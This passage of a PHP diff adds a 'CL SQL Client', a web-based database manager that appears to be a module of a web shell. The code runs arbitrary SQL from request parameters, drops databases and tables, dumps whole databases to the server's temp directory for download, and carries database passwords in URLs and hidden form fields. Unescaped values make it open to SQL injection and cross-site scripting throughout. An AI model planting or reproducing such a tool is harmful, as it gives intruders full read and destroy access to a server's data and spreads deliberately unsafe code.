+          "Current user"    => get_current_user(),
+         );
+ }
+}
+
+/*
+ * SQL error reporting
+ */
+function error($error, $query) {
+ echo(nl2br( '<script>'."alert('"."\\n\\nThe following query failed\\n\\nSQL error message: \\n".addslashes($error)."\\n\\nFollowing query: `".addslashes($query)."`\\n\\n"."')".'</script>'."<BR><BR><font color=\"red\">Query execute faild</font><BR><hr width=\"400\"><BR>Please click <a href=\"javascript:history.back(-1)\">here</a> to go back\n\n"));
+}
+
+/*
+ * SQL query execute
+ */
+function query($id, $query) {
+ global $lang,$language;
+ $res = '';
+ if((isset($query)) && (!empty($query))) {
+  $query = stripslashes($query);
+  $res = sql_query($query, $id);
+  if (sql_error()) {
+   error(sql_error(), $query);
+  } else {
+   return $res;
+  }
+ } else {
+  return false;
+ }
+}
+
+/*
+ * SQL quick launch
+ */
+function quicklaunch() {
+ global $lang,$language,$baseurl,$server,$port,$login,$password;
+ $quicklaunch = array
+   (
+    array($lang[$language.'_text1'],$baseurl."&act=11"),
+    array($lang[$language.'_text2'],$baseurl."&act=09"),
+    array($lang[$language.'_text3'],$baseurl."&act=01"),
+    array($lang[$language.'_text4'],$baseurl."&act=00"),
+    array($lang[$language.'_text5'],$baseurl."&act=08"),
+    array($lang[$language.'_text30'],$baseurl."&act=13"),
+   );
+ $str = "<table border=\"0\" width=\"960\">\n<tr align=\"center\">\n <td rowspan=\"2\" width=\"46\"><a href=\"javascript:history.back(-1)\" title=\"�����\"><img src=\"".basename(__FILE__)."?image=back\"></a></td>\n <td rowspan=\"2\" width=\"47\"><a href=\"javascript:location.reload();\" title=\"Refresh\"><img src=\"".basename(__FILE__)."?image=reload\"></a></td>\n <td rowspan=\"2\" width=\"48\"><a href=\"".$baseurl."\" title=\"�� �������\"><img src=\"".basename(__FILE__)."?image=home\"></a></td>\n <td rowspan=\"2\" width=\"48\"><a href=\"".basename(__FILE__)."?\" title=\"Login page\"><img src=\"".basename(__FILE__)."?image=log_in_off\"></a></td>\n <td colspan=\"".count($quicklaunch)."\" width=\"760\"><hr><img border=\"0\" src=\"".basename(__FILE__)."?image=info\" align=\"absmiddle\"><B>".get_server_info()." running in ".AlphanumericalClean($server).":".AlphanumericalClean($port)." as ".AlphanumericalClean($login)." </B><BR><hr></td>\n</tr>\n<tr>";
+ if (count($quicklaunch) > 0) {
+  foreach($quicklaunch as $item) {
+   $str .= "\n <td align=\"center\">[ <a href=\"".$item[1]."\">".$item[0]."</a> ]</td>";
+  }
+ }
+ $str .= "\n</tr>\n</table>\n<BR>";
+ return $str;
+}
+
+/*
+ * List Of DB`s
+ */
+function db_list($id) {
+ global $lang,$language,$baseurl;
+ $db_list = query($id, "SHOW DATABASES"); // [-]
+ $db_count = sql_num_rows($db_list);
+ $str = "<img border=\"0\" src=\"".basename(__FILE__)."?image=db\" valign=\"middle\"><B>".$lang[$language.'_text6']."</B>\n<table border=\"0\" width=\"200\">\n<tr align=\"center\">\n <td colspan=\"2\"><B>".$lang[$language.'_text7']."</B></td>\n <td colspan=\"2\"><B>".$lang[$language.'_text8']."</B></td>\n</tr>";
+ while($odj = sql_fetch_object($db_list)) {
+  //$tbls = sql_num_rows(mysql_list_tables($tmp[1])); [-]
+  $str .= "\n<tr align=\"center\">\n <td><img border=\"0\" src=\"".basename(__FILE__)."?image=browse_db\" align=\"absmiddle\"></td>\n <td><a href=\"".$baseurl."&act=02&db=".$odj->Database."\">".$odj->Database."</a></td>\n <td><a href=\"".$baseurl."&act=10&dump=db&db=".$odj->Database."\" title=\"Backup Database ".$odj->Database."\"><img src=\"".basename(__FILE__)."?image=save\" align=\"absmiddle\"></a></td>\n <td><a href=\"javascript: confirm_function('".$baseurl."&act=03&db=".$odj->Database."');\" title=\"Drop Database ".$odj->Database."\"><img src=\"".basename(__FILE__)."?image=drop\" align=\"center\"></a>\n</tr>";
+ }
+ $str .= "\n<tr align=\"center\">\n <td colspan=\"4\">".$lang[$language.'_text10'].": <B>".$db_count."</B></td>\n</tr>\n<tr align=\"center\">\n <td colspan=\"4\"><a href=\"".$baseurl."&act=04\">[ ".$lang[$language.'_text9']." ]</a></td>\n</tr>\n</table>\n";
+ return $str;
+}
+
+/*
+ * SQL dump DB
+ */
+function dump_db($id, $db,& $type) {
+ global $lang,$language,$baseurl,$dbtype;
+ $tmp = server_info();
+ $act_sql = query( $id, "SHOW TABLES FROM `".AlphanumericalClean($db)."`" );
+ if (sql_num_rows($act_sql) > 0) {
+  if((isset($type))) {
+   $file = $tmp["TMP_DIR"]."/db_".$_SERVER["SERVER_NAME"]."_".$dbtype."_".date("Y-m-d-H-i-s").".sql";
+   $fp = fopen($file, "w");
+   if (!$fp) {
+    return "<BR>Dump error! Can't write to ".htmlspecialchars($file);
+   }
+   fputs ($fp, "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# [ SQL Client ]\n# Dumped by SQL Client \n#\n# SQL version: (".get_server_info().")\n# Date: ".date("F j, Y, g:i a")."\n# Dump DB: `$db`"."\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
+  }
+  switch($type) {
+   case "struct":
+    while ($tbl = sql_fetch_row($act_sql)) {
+     fputs($fp, "\n#\n# Dump for table: `".$tbl[0]."`;\n#\n");
+     fputs($fp, "\nDROP TABLE IF EXISTS `".$tbl[0]."`;\n");
+     $sql = query( $id, "SHOW CREATE TABLE `$tbl[0]`");
+     $row = sql_fetch_row($sql);
+     fputs($fp, $row[1].";\n\n");
+    }
+   break;
+   case "data":
+    while ($tbl = sql_fetch_row($act_sql)) {
+     fputs($fp, "\n#\n# Dump for table: `".$tbl[0]."`;\n#\n");
+     $sql = query( $id, "SELECT * FROM `$tbl[0]`" );
+     if (sql_num_rows($sql) > 0) {
+      while ($row = sql_fetch_assoc($sql)) {
+       $keys = implode("`, `", array_keys($row));
+       $values = array_values($row);
+       foreach($values as $key=>$value) {
+        $values[$key] = addslashes($value);
+       }
+       $values = implode("', '", $values);
+       $sql_dump = "INSERT INTO `$tbl[0]` (`".$keys."`) VALUES ('".$values."');\n";
+       fputs($fp, $sql_dump);
+      }
+     } else {
+      fputs($fp, "# TABLE `$tbl[0]` IS AMPTY\n\n");
+     }
+    }
+   break;
+   case "full":
+    while ($tbl = sql_fetch_row($act_sql)) {
+     fputs($fp, "\n#\n# Dump for table: `".$tbl[0]."`;\n#\n");
+     fputs($fp, "\nDROP TABLE IF EXISTS `".$tbl[0]."`;\n");
+     $sql = query( $id, "SHOW CREATE TABLE `$tbl[0]`");
+     $row = sql_fetch_row($sql);
+     fputs($fp, $row[1].";\n\n");
+     $sql = query( $id, "SELECT * FROM `$tbl[0]`" );
+     if (sql_num_rows($sql) > 0) {
+      while ($row = sql_fetch_assoc($sql)) {
+       $keys = implode("`, `", array_keys($row));
+       $values = array_values($row);
+       foreach($values as $key=>$value) {
+        $values[$key] = addslashes($value);
+       }
+       $values = implode("', '", $values);
+       $sql_dump = "INSERT INTO `$tbl[0]` (`".$keys."`) VALUES ('".$values."');\n";
+       fputs($fp, $sql_dump);
+      }
+     } else {
+      fputs($fp, "# TABLE `$tbl[0]` IS AMPTY\n\n");
+     }
+    }
+   break;
+   default:
+    return "<BR><BR><B>Backup DataBase</B><BR><table><tr> <td><a href=\"".$baseurl."&act=10&dump=db&db=".$db."&type=full\">Full backup (Strukture and Data)</a></td></tr><tr> <td><a href=\"".$baseurl."&act=10&dump=db&db=".$db."&type=struct\">Only Structure</a></td></tr><tr> <td><a href=\"".$baseurl."&act=10&dump=db&db=".$db."&type=data\">Only data info</a></td></tr></table>";
+   break;
+  }
+  fclose($fp);
+ } else {
+  return "\n<BR><BR>Database ".AlphanumericalClean($db)." is empty or Database doesn't exist";
+ }
+ return "\n<BR><BR><font color=\"green\">Dumped! Dump has been writed to <a href=\"".$baseurl."&act=11&file=".urlencode(realpath($file))."\">".htmlspecialchars(realpath($file))."</a> (".formatsize(@filesize($file)).")</font><BR><BR>\n<img border=\"0\" src=\"".basename(__FILE__)."?image=download\">&nbsp;<B>".$lang[$language.'_text26']."</B>&nbsp;<a href=\"".$baseurl."&act=12&file=".urlencode($file)."\">Click</a>";
+}
+
+
+/*
+ * SQL dump table
+ */
+function dump_tbl($id, $tbl, $type) {
+ global $lang,$language,$baseurl,$dbtype;
+ $tmp = server_info();
+ if((isset($type))) {
+  $file = $tmp["TMP_DIR"]."/tbl_".$_SERVER["SERVER_NAME"]."_".$dbtype."_".date("Y-m-d-H-i-s").".sql";
+  $fp = fopen($file, "w");
+  if (!$fp) {
+   return "<BR>Dump error! Can't write to ".htmlspecialchars($file);
+  }
+  fputs ($fp, "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# [ SQL Client ]\n# Dumped by SQL Client \n#\n# SQL version: (".get_server_info().")\n# Date: ".date("F j, Y, g:i a")."\n# Dump table: `$tbl`"."\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
+ }
+ switch($type) {
+  case "struct":
+   fputs($fp, "\nDROP TABLE IF EXISTS `".$tbl."`;\n");
+   $sql = query( $id, "SHOW CREATE TABLE `".$tbl."`");
+   $row = sql_fetch_row($sql);
+   fputs($fp, $row[1].";\n\n");
+  break;
+  case "data":
+   $sql = query( $id, "SELECT * FROM `".$tbl."`" );
+   if (sql_num_rows($sql) > 0) {
+    while ($row = sql_fetch_assoc($sql)) {
+     $keys = implode("`, `", array_keys($row));
+     $values = array_values($row);
+     foreach($values as $key=>$value) {
+      $values[$key] = addslashes($value);
+     }
+     $values = implode("', '", $values);
+     $sql_dump = "INSERT INTO `$tbl` (`".$keys."`) VALUES ('".$values."');\n";
+     fputs($fp, $sql_dump);
+    }
+   } else {
+    fputs($fp, "# TABLE `$tbl` IS AMPTY\n\n");
+   }
+  break;
+  case "full":
+   fputs($fp, "\nDROP TABLE IF EXISTS `".$tbl."`;\n");
+   $sql = query( $id, "SHOW CREATE TABLE `".$tbl."`");
+   $row = sql_fetch_row($sql);
+   fputs($fp, $row[1].";<BR><BR>");
+   $sql = query( $id, "SELECT * FROM `$tbl`" );
+   if (sql_num_rows($sql) > 0) {
+    while ($row = sql_fetch_assoc($sql)) {
+     $keys = implode("`, `", array_keys($row));
+     $values = array_values($row);
+     foreach($values as $key=>$value) {
+      $values[$key] = addslashes($value);
+     }
+     $values = implode("', '", $values);
+     $sql_dump = "INSERT INTO `$tbl` (`".$keys."`) VALUES ('".$values."');\n";
+     fputs($fp, $sql_dump);
+    }
+   } else {
+    fputs($fp, "# TABLE `$tbl` IS AMPTY\n\n");
+   }
+   break;
+   default:
+    return "\n<BR><BR><B>Backup Table</B><BR><table><tr> <td><a href=\"".$baseurl."&act=10&dump=tbl&tbl=".$tbl."&type=full\">Full backup (Strukture and Data)</a></td></tr><tr> <td><a href=\"".$baseurl."&act=10&dump=tbl&tbl=".$tbl."&type=struct\">Only Structure</a></td></tr><tr> <td><a href=\"".$baseurl."&act=10&dump=tbl&tbl=".$tbl."&type=data\">Only data info</a></td></tr></table>";
+   break;
+ }
+ fclose($fp);
+ return "\n<BR><BR><font color=\"green\">Dumped! Dump has been writed to <a href=\"".$baseurl."&act=11&file=".urlencode(realpath($file))."\">".htmlspecialchars(realpath($file))."</a> (".formatsize(@filesize($file)).")</font><BR><BR>\n<img border=\"0\" src=\"".basename(__FILE__)."?image=download\">&nbsp;<B>".$lang[$language.'_text26']."</B>&nbsp;<a href=\"".$baseurl."&act=12&file=".urlencode($file)."\">Click</a>";
+}
+
+// Check Variables
+if(isset($dbtype)) {
+ if($server) {
+  $server = AlphanumericalClean($server);
+  $baseurl .= "&server=".$server;
+ }
+ if($port) {
+  $port = intval($port);
+  $baseurl .= "&port=".AlphanumericalClean($port);
+ }
+ if(empty($login)) {
+  $login = 'nobody';
+ }
+ $login = AlphanumericalClean($login);
+ $baseurl .= "&login=".$login;
+
+ if($passwd) {
+  $password = AlphanumericalClean($password);
+  $baseurl .= "&password=".$password;
+ } else {
+  $baseurl .= "&password=";
+ }
+ if($db) {
+  $db = AlphanumericalClean($db);
+  $baseurl .= "&db=".$db;
+ }
+ $baseurl .= "&dbtype=".$dbtype;
+ // Return identificator
+ $id = sql_connect($server.":".$port, $login, $password, $db) or die("ERROR! Can't connect to SQL server");
+} else {
+ die("<form method=\"post\">\n<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" height=\"100%\">\n<tr height=\"115\">\n <td height=\"115\" align=\"center\" valign=\"middle\"><center><h1>CL SQL Client Login</h1>\n<table border=\"0\" cellpadding=\"5\" cellspacing=\"3\">\n<tr>\n <td>Username:</td>\n <td><input type=\"text\" name=\"login\" value=\"\" size=\"24\"></td>\n</tr>\n<tr>\n <td>Password:</td>\n <td><input type=\"password\" name=\"password\" size=\"24\"></td>\n</tr>\n<tr>\n <td>Server IP:</td>\n <td><input type=\"text\" name=\"server\" value=\"localhost\" size=\"24\"></td>\n</tr>\n<tr>\n <td>Server Port:</td>\n <td><input type=\"text\" name=\"port\" value=\"3306\" size=\"24\"></td>\n</tr>\n<tr>\n <td>SQL Server (type):</td>\n <td><select name=\"dbtype\"><option value=\"mysql\">mySQL</option><option value=\"msql\">mSQL</option><option value=\"postgres\">PostgresSQL</option><option value=\"Interbase\">Interbase</option><option value=\"Sybase\">Sybase</option><option value=\"Sybase\">ODBC</option></select></td>\n</tr>\n<tr>\n <td colspan=\"2\" align=\"right\" valign=\"middle\"><input type=\"submit\" value=\"Login\"></td>\n</tr>\n</table>\n</center></td>\n</tr>\n</table>\n</form>");
+}
+
+
+//--------------------------------
+//  HTML header
+//--------------------------------
+//
+echo "<html>\n<head>\n<title>[  CL SQL Client  ]</title>\n<meta http-equiv=Content-Type Pragma: no-cache; content=\"text/html; charset=windows-1251\">\n<style>\n* {\n margin: 0;\n padding: 0;\n}\nbody {\n margin-top: 1px;\n margin-right: 1px;\n margin-bottom: 1px;\n margin-left: 1px;\n background-color: #CCCCCC;\n font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;\n font-size:12px;\n}
+table {\n padding: 0em;\n font-size: 0.85em;\n background-color: #D7D8DA;\n}\ntr {\n font-size:12px;\n BORDER-RIGHT: #aaaaaa 1px solid;\n BORDER-TOP: #eeeeee 1px solid;\n BORDER-LEFT: #eeeeee 1px solid;\n BORDER-BOTTOM: #aaaaaa 1px solid;\n}\ntd {\n font-size:12px;\n BORDER-RIGHT: #aaaaaa 1px solid;\n BORDER-TOP: #eeeeee 1px solid;\n BORDER-LEFT: #eeeeee 1px solid;\n BORDER-BOTTOM: #aaaaaa 1px solid;\n}\na {\n color: #003366;\n text-decoration: none;\n}\na:hover {\n color: #003366;\n}\na img {\n border: none;\n}\ninput,textarea,select {\n font-family: Verdana, Tahoma, Helvetica, Arial, sans-serif;\n font-size: 1em;\n}\n</style>\n<script language=\"javascript\">function confirm_function(url) {\n if(confirm('�� �������?')){\n  window.location = ''+url;\n }\n}</script></head>\n<body>\n".quicklaunch()."\n<table border=\"0\" width=\"960\">\n<tr align=\"center\" valign=\"top\">\n <td width=\"200\">".db_list($id)."</td>\n<td width=\"760\">\n<center>\n";
+
+// Switching $act
+if($act == '00') {
+ $sql = query($id, "SHOW VARIABLES");
+ echo "\n<img border=\"0\" src=\"".basename(__FILE__)."?image=host\">&nbsp;<B>".$lang[$language.'_text4']."</B>\n<BR>";
+ echo "\n<table border=\"0\" width=\"700\">\n<tr>\n <td><B>Name</B></td>\n <td><B>Value</B></td>\n</tr>";
+ while ($row = sql_fetch_assoc($sql)) {
+  echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\">\n <td><B>".$row["Variable_name"]."</B></td>\n <td>".$row["Value"]."</td>\n</tr>";
+ }
+ echo "\n</table>\n";
+ @sql_free_result($sql);
+ unset($sql);
+} elseif($act == '01') {
+ $sql = query($id, "SHOW STATUS");
+ echo "\n<img border=\"0\" src=\"".basename(__FILE__)."?image=host\">&nbsp;<B>".$lang[$language.'_text3']."</B>\n<BR>";
+ echo "\n<table border=\"0\" width=\"700\">\n<tr>\n <td><B>Name</B></td>\n <td><B>Value</B></td>\n</tr>";
+ while ($row = sql_fetch_assoc($sql)) {
+  echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\">\n <td><B>".$row["Variable_name"]."</B></td>\n <td>".$row["Value"]."</td>\n</tr>";
+ }
+ echo "\n</table>\n";
+ @sql_free_result($sql);
+ unset($sql);
+} elseif($act == '02') {
+ $quicklaunch = array
+   (
+    array($lang[$language.'_text15'],$baseurl."&act=07"),
+    array($lang[$language.'_text12'],$baseurl."&act=10&dump=db&db=".$db),
+    array($lang[$language.'_text13'],"javascript: confirm_function('".$baseurl."&act=03&db=".$db."');"),
+   );
+ echo "\n[ <img border=\"0\" src=\"".basename(__FILE__)."?image=browse_db\" align=\"absmiddle\"> ".$lang[$language.'_text7'].": <B>".AlphanumericalClean($db)."</B> ]<BR><BR>";
+ if (count($quicklaunch) > 0) {
+  foreach($quicklaunch as $item) {
+   echo "[ <a href=\"".$item[1]."\"><B>".$item[0]."</B></a> ] ";
+  }
+ }
+ if (!sql_num_rows(query($id, "SHOW TABLES FROM `".AlphanumericalClean($db)."`"))) { // [-]
+  if(sql_error()) {
+   echo "\n<BR><BR>".sql_error()."<BR>";
+  } else {
+   echo "\n<BR><BR><B>Database ".AlphanumericalClean($db)." is empty</B><BR>";
+  }
+ } else {
+  $sql = query($id, "SHOW TABLE STATUS FROM `".$db."`");
+  echo "\n<BR><BR><table border=\"0\" width=\"700\">\n<tr align=\"center\">\n <td colspan=\"2\">Table</td>\n <td>Rows</td>\n <td>Type</td>\n <td>Created</td>\n <td>Modified</td>\n <td>Size</td>\n <td colspan=\"3\">Quick Action</td>\n</tr>";
+  while ($row = @sql_fetch_assoc($sql)) {
+   echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\" align=\"center\" width=\"700\">\n <td><img border=\"0\" src=\"".basename(__FILE__)."?image=tbl\" align=\"absmiddle\"></td>\n <td><a href=\"".$baseurl."&act=05&tbl=".urlencode($row["Name"])."\">".$row["Name"]."</a></td>\n <td>".$row["Rows"]."</td> <td>".$row["Type"]."</td>\n <td>".$row["Create_time"]."</td>\n <td>".$row["Update_time"]."</td>\n <td>".formatsize($row["Avg_row_length"])."</td>\n <td><a href=\"".$baseurl."&act=10&dump=tbl&tbl=".$row["Name"]."\" title=\"Backup Table ".$row["Name"]."\"><img src=\"".basename(__FILE__)."?image=save\" align=\"absmiddle\"></a></td>\n <td><a href=\"javascript: confirm_function('".$baseurl."&act=09&query=".urlencode("DROP TABLE `".$row["Name"]."`")."');\" title=\"DROP Table ".$row["Name"]."\"><img src=\"".basename(__FILE__)."?image=drop\" align=\"absmiddle\"></a></td>\n <td><a href=\"javascript: confirm_function('".$baseurl."&act=09&query=".urlencode("DELETE FROM `".$row["Name"]."`")."');\" title=\"ClearTable ".$row["Name"]."\"><img src=\"".basename(__FILE__)."?image=clear\" align=\"absmiddle\"></a></td>\n</tr>";
+  }
+  echo "\n</table>\n";
+  @sql_free_result($sql);
+  unset($sql);
+ }
+} elseif($act == '03') {
+ $sql = query($id, "DROP DATABASE `".AlphanumericalClean($db)."`");
+ if($sql) {
+  echo "\n<BR><BR><font color=\"green\">Database <B>".AlphanumericalClean($db)."</B> deleted successfully</font>";
+ }
+ @sql_free_result($sql);
+ unset($sql);
+} elseif($act == '04') {
+ if(!isset($new_db)) {
+  echo "\n<BR><BR><B>".$lang[$language.'_text9']."</B><BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"act\" value=\"04\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">".$lang[$language.'_text7'].": <input type=\"text\" name=\"new_db\" value=\"\" maxlength=\"10\">\n<input type=\"submit\" value=\"create\">\n</form>";
+ } else {
+  $sql = query($id, "CREATE DATABASE `".AlphanumericalClean($new_db)."`");
+  if($sql) {
+   echo "\n<BR><BR><font color=\"green\">Database <B>".AlphanumericalClean($new_db)."</B> created successfully</font>";
+  }
+  @sql_free_result($sql);
+  unset($sql);
+ }
+} elseif($act == '05') {
+ echo "\n[ <img border=\"0\" src=\"".basename(__FILE__)."?image=tbl\" align=\"center\"> ".$lang[$language.'_text14'].": <B>".AlphanumericalClean($tbl)."</B> ] [ <img border=\"0\" src=\"".basename(__FILE__)."?image=browse_db\" align=\"center\"> ".$lang[$language.'_text7'].": <B><a href=\"".$baseurl."&act=02\">".AlphanumericalClean($db)."</a></B> ]<BR><BR>";
+ $quicklaunch = array
+   (
+    array($lang[$language.'_text16'],$baseurl."&act=05&tbl=".$tbl),
+    array($lang[$language.'_text17'],$baseurl."&act=05&tbl=".$tbl."&CODE=00"),
+    array($lang[$language.'_text18'],$baseurl."&act=05&tbl=".$tbl."&CODE=01"),
+    array($lang[$language.'_text19'],$baseurl."&act=05&tbl=".$tbl."&CODE=04"),
+    array($lang[$language.'_text20'],"javascript: confirm_function('".$baseurl."&act=05&tbl=".$tbl."&CODE=02');"),
+    array($lang[$language.'_text21'],$baseurl."&act=10&dump=tbl&tbl=".$tbl),
+   );
+ if (count($quicklaunch) > 0) {
+  foreach($quicklaunch as $item) {
+   echo "[ <a href=\"".$item[1]."\"><B>".$item[0]."</B></a> ] ";
+  };
+ }
+ if($CODE == '00' && isset($tbl)) {
+  $sql = query($id, "SELECT * FROM `".AlphanumericalClean($tbl)."`");
+  if(!sql_num_rows($sql)) {
+   echo "\n<BR><BR>Table is ampty";
+  } else {
+   echo "\n<BR><BR><table align=\"center\" width=\"700\">\n<tr align=\"center\">";
+   for( $i=0; $i < sql_num_fields($sql); $i++ ) {
+    echo "\n <td><B>".sql_field_name($sql,$i)."</B></td>";
+   }
+   echo "\n <td colspan=\"2\"><B>Action</B></td>\n</tr>";
+   while ($row = @sql_fetch_assoc($sql)) {
+    $edit = '';
+    echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\" align=\"center\">";
+    foreach ($row as $key=>$value) {
+     echo "\n <td>".substr(htmlspecialchars($value), 0, 64)."</td>";
+    }
+    foreach ($row as $key=>$value) {
+     $edit .= urlencode("`$key`='$value' AND ");
+    }
+    $pm = substr($edit,"",-5);
+    echo "\n <td><a href=\"".$baseurl."&act=05&tbl=".$tbl."&CODE=03&pm=".$pm."\" title=\"Edit row\"><img border=\"0\" src=\"".basename(__FILE__)."?image=edit\" align=\"center\"></a></td>\n <td><a href=\"".$baseurl."&act=09&query=DELETE+FROM+".$tbl."+WHERE+".$pm."\" title=\"Delete row\"><img border=\"0\" src=\"".basename(__FILE__)."?image=drop\" align=\"center\"></a></td>\n</tr>";
+    unset($edit);
+   }
+   echo "\n</table>\n";
+  }
+  @sql_free_result($sql);
+  unset($sql);
+ } elseif($CODE == '01') {
+  if((isset($values)) && (count($values))) {
+   foreach($values as $key=>$value) {
+    $fields .= "`".$key."`, ";
+    $val .= '"'.$value.'", ';
+   }
+   $sql = query($id, "INSERT INTO `".$tbl."` ( ".substr($fields,"",-2)." ) VALUES ( ".substr($val,"",-2)." ); ");
+   if($sql) {
+    echo "\n<BR><BR><font color=\"green\">New row successfull inserted into table  [ <B>".AlphanumericalClean($tbl)."</B> ]<BR>(Last inserted record has id ".mysql_insert_id($id).")</font><BR>";
+   }
+   @sql_free_result($sql);
+   unset($sql);
+  } else {
+   $sql = query($id, "DESC `".$tbl."`");
+   echo "\n<BR><BR>Insert row into table  [ <img border=\"0\" src=\"".basename(__FILE__)."?image=tbl\" align=\"center\"> <B>".AlphanumericalClean($tbl)."</B> ]<BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">\n<input type=\"hidden\" name=\"act\" value=\"05\">\n<input type=\"hidden\" name=\"CODE\" value=\"01\">\n<input type=\"hidden\" name=\"tbl\" value=\"".$tbl."\">\n<table align=\"center\" border=\"0\" width=\"700\">\n<tr>\n <td>Field</td>\n <td>Type</td>\n <td>Value</td>\n</tr>";
+   while ($row = sql_fetch_assoc($sql)) {
+    $tmp = $row["Type"]." ".$row["Extra"];
+    echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\"> <td>".$row["Field"]."</td> <td>".$tmp."</td> <td align=\"center\"><input type=\"text\" name=\"values[".$row["Field"]."]\" value=\"\"></td></tr>";
+   }
+   echo "\n</table>\n<input type=\"submit\" value=\"Insert\">\n</form>";
+   @sql_free_result($sql);
+   unset($sql);
+  }
+ } elseif($CODE == '02') {
+  $sql = query($id, "DROP TABLE `".AlphanumericalClean($tbl)."`");
+  if($sql) {
+   echo "\n<BR><BR><font color=\"green\">Table <B>".AlphanumericalClean($tbl)."</B> deleted successfully</font>";
+  }
+  @sql_free_result($sql);
+  unset($sql);
+ } elseif($CODE == '03') {
+  if(count($values)) {
+   foreach($values as $key=>$value) {
+    $edit .= "`".$key."` = '".$value."', ";
+   }
+   $sql = query($id, "UPDATE `".AlphanumericalClean($tbl)."` SET ".substr($edit,"",-2)." WHERE ".stripslashes(urldecode($pm))."");
+   if($sql) {
+    echo "\n<BR><BR><font color=\"green\">Successfull saved</font><BR>";
+   }
+   @sql_free_result($sql);
+   unset($sql);
+  } else {
+   $sql = query($id, "SELECT * FROM `".AlphanumericalClean($tbl)."` WHERE $pm LIMIT 1");
+   echo "\n<BR><BR>Insert row into table  [ <B>".AlphanumericalClean($tbl)."</B> ]<BR>\n<form method=\"post\" action=\"".basename(__FILE__)."\">\n<input type=\"hidden\" name=\"login\" value=\"".$login."\">\n<input type=\"hidden\" name=\"password\" value=\"".$password."\">\n<input type=\"hidden\" name=\"server\" value=\"".$server ."\">\n<input type=\"hidden\" name=\"port\" value=\"".$port ."\">\n<input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\">\n<input type=\"hidden\" name=\"db\" value=\"".$db."\">\n<input type=\"hidden\" name=\"act\" value=\"05\"><input type=\"hidden\" name=\"pm\" value=\"".$pm."\">\n<input type=\"hidden\" name=\"CODE\" value=\"03\">\n<input type=\"hidden\" name=\"tbl\" value=\"".$tbl."\">\n<table align=\"center\" border=\"0\" width=\"700\">\n<tr>\n <td>Field</td>\n <td>Value</td>\n</tr>";
+   while ($row = sql_fetch_assoc($sql)) {
+    foreach($row as $key=> $value) {
+     echo "\n<tr onmouseover=this.style.backgroundColor=\"#CCCCCC\" onmouseout=this.style.backgroundColor=\"\"> <td>".$key."</td> <td align=\"center\"><input type=\"text\" name=\"values[".$key."]\" value=\"".$value."\"></td></tr>";
+    }
+   }
+   echo "\n</table>\n<input type=\"submit\" value=\"Save\">\n</form>\n";
+   @sql_free_result($sql);
+   unset($sql);
+  }
+ } elseif($CODE == '04') {
+  if(count($values) && isset($values)) {
+   foreach($values as $key=>$value) {
+    $edit .= " MODIFY `".$key."` ".$value.", ";
+   }
+   $sql = query($id, "ALTER TABLE `".AlphanumericalClean($tbl)."` ".substr(stripslashes($edit),"",-2)."; ");
+   if($sql) {
+    echo "\n<BR><BR><font color=\"green\">Successfull saved</font><BR>";
+   }
+   @sql_free_result($sql);
+   unset($sql);
+  } else {
+   $sql = query($id, "DESC `".AlphanumericalClean($tbl)."`");
+   echo "\n<BR><BR>Alter table  [ <B>".AlphanumericalClean($tbl)."</B> ]<form method=\"post\" action=\"".basename(__FILE__)."\"><input type=\"hidden\" name=\"login\" value=\"".$login."\"><input type=\"hidden\" name=\"password\" value=\"".$password."\"><input type=\"hidden\" name=\"server\" value=\"".$server ."\"><input type=\"hidden\" name=\"port\" value=\"".$port ."\"><input type=\"hidden\" name=\"dbtype\" value=\"".$dbtype."\"><input type=\"hidden\" name=\"db\" value=\"".$db."\"><input type=\"hidden\" name=\"act\" value=\"05\"><input type=\"hidden\" name=\"CODE\" value=\"04\"><input type=\"hidden\" name=\"tbl\" value=\"".$tbl."\">\n<BR><table align=\"center\" border=\"0\" width=\"700\">\n<tr>\n <td>Field</td>\n <td>Type</td>\n</tr>";
+   while ($row = sql_fetch_assoc($sql)) {
+    $tmp = $row["Type"]." ".$row["Extra"];
+    echo "\n<tr>\n <td>".$row["Field"]."</td>\n <td><input type=\"text\" name=\"values[".$row["Field"]."]\" value=\"".$tmp."\"></td>\n</tr>";
+    unset($tmp);
+   }
+   echo "\n</table>\n<input type=\"submit\" value=\"Save\">\n";
+  }
+ } else {
+  $quicklaunch = array(
+   array("Add new column",$baseurl."&act=05&tbl=".$tbl),
+  );
+  $sql = query($id, "DESC `".AlphanumericalClean($tbl)."`");
+  if(!sql_num_fields($sql)) {
+   echo "\n<BR><BR>Table is ampty";
+  } else {
